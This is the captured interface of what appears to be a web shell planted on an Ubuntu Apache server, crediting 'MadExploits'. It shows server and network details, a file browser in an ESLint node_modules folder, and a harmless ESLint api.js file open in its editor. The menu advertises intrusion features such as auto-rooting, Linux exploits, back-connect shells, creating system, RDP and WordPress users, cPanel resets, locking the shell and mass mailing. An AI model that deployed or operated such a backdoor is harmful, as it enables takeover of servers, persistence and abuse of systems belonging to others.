Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
eslint /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
cli-engine
[ DIR ]
drwxrwxr-x
config
[ DIR ]
drwxrwxr-x
eslint
[ DIR ]
drwxrwxr-x
linter
[ DIR ]
drwxrwxr-x
rule-tester
[ DIR ]
drwxrwxr-x
rules
[ DIR ]
drwxrwxr-x
shared
[ DIR ]
drwxrwxr-x
source-code
[ DIR ]
drwxrwxr-x
api.js
715
B
-rw-rw-r--
cli.js
15.06
KB
-rw-rw-r--
options.js
13.83
KB
-rw-rw-r--
unsupported-api.js
981
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : api.js
/** * @fileoverview Expose out ESLint and CLI to require. * @author Ian Christian Myers */ "use strict"; //----------------------------------------------------------------------------- // Requirements //----------------------------------------------------------------------------- const { ESLint } = require("./eslint"); const { Linter } = require("./linter"); const { RuleTester } = require("./rule-tester"); const { SourceCode } = require("./source-code"); //----------------------------------------------------------------------------- // Exports //----------------------------------------------------------------------------- module.exports = { Linter, ESLint, RuleTester, SourceCode };
Close